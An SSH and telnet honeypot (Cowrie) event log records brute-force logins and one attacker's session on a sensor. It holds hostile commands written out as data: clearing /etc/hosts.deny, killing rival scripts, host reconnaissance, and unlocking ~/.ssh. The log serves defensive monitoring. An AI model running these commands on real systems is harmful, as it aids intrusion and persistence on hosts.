{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/327685ba908fa191d58b0b96ccdda94c66ab9b0888c795cb868628d346c808d7","size":21,"shasum":"327685ba908fa191d58b0b96ccdda94c66ab9b0888c795cb868628d346c808d7","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/327685ba908fa191d58b0b96ccdda94c66ab9b0888c795cb868628d346c808d7 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:58.179426Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48034,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7752bcfa969","protocol":"ssh","message":"New connection: 212.227.235.229:48034 (1.2.3.4:22) [session: b7752bcfa969]","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.059754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.060666Z","src_ip":"212.227.235.229","session":"b7752bcfa969"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.178019Z","src_ip":"212.227.235.229","session":"b7752bcfa969"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:00.583355Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.584033Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos.123","message":"login attempt [centos/centos.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.705082Z","src_ip":"212.227.235.229","session":"b7752bcfa969"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.832784Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.833707Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33798,"dst_ip":"1.2.3.4","dst_port":22,"session":"874c78afe7e4","protocol":"ssh","message":"New connection: 212.227.235.229:33798 (1.2.3.4:22) [session: 874c78afe7e4]","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.964244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:00.964958Z","src_ip":"212.227.235.229","session":"874c78afe7e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:01.273314Z","src_ip":"212.227.235.229","session":"874c78afe7e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:01.361006Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T01:32:01.361738Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:01.608676Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:01.824604Z","src_ip":"212.227.235.229","session":"b7752bcfa969"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:02.197433Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T01:32:02.198205Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:02.455453Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.login.failed","username":"butter","password":"12345","message":"login attempt [butter/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:02.546545Z","src_ip":"212.227.235.229","session":"874c78afe7e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:02.952926Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T01:32:02.953595Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T01:32:02.954338Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:03.857529Z","src_ip":"212.227.235.229","session":"874c78afe7e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:04.360600Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:05.107932Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T01:32:05.108603Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:06.055388Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:06.351079Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T01:32:06.351722Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:06.590793Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53474,"dst_ip":"1.2.3.4","dst_port":22,"session":"96571b89873e","protocol":"ssh","message":"New connection: 212.227.235.229:53474 (1.2.3.4:22) [session: 96571b89873e]","sensor":"my-vps","timestamp":"2025-09-09T01:32:06.600148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:06.600757Z","src_ip":"212.227.235.229","session":"96571b89873e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:06.924368Z","src_ip":"212.227.235.229","session":"96571b89873e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:07.082185Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T01:32:07.082878Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:07.325073Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:08.030724Z","src_ip":"212.227.235.229","session":"96571b89873e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:08.817912Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T01:32:08.818715Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:09.070166Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:09.298483Z","src_ip":"212.227.235.229","session":"96571b89873e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:10.016082Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T01:32:10.016898Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:11.384624Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:11.678359Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T01:32:11.679196Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:12.612704Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:12.924864Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T01:32:12.925628Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:13.159890Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:13.913013Z","src_ip":"212.227.125.160","session":"62867963bfd2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:14.099377Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T01:32:14.100065Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:14.341254Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:15.838288Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T01:32:15.839072Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:16.767528Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:17.044151Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T01:32:17.045062Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:17.575583Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.closed","duration":"39.8","message":"Connection lost after 39.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:17.576691Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35674,"dst_ip":"1.2.3.4","dst_port":23,"session":"e24dfa4f1c09","protocol":"telnet","message":"New connection: 212.227.125.160:35674 (1.2.3.4:23) [session: e24dfa4f1c09]","sensor":"my-vps","timestamp":"2025-09-09T01:32:18.894134Z"}
{"eventid":"cowrie.session.closed","duration":15.110741138458252,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:34.004810Z","src_ip":"212.227.125.160","session":"e24dfa4f1c09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57962,"dst_ip":"1.2.3.4","dst_port":22,"session":"29055b2b2be8","protocol":"ssh","message":"New connection: 212.227.235.229:57962 (1.2.3.4:22) [session: 29055b2b2be8]","sensor":"my-vps","timestamp":"2025-09-09T01:32:35.734756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:35.736013Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:36.005725Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51430,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c9b111c1d6c","protocol":"telnet","message":"New connection: 212.227.125.160:51430 (1.2.3.4:23) [session: 1c9b111c1d6c]","sensor":"my-vps","timestamp":"2025-09-09T01:32:37.116425Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@111","message":"login attempt [root/Admin@111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:32:37.124233Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:37.710684Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:32:37.711368Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:32:37.712449Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:37.982590Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:38.582301Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
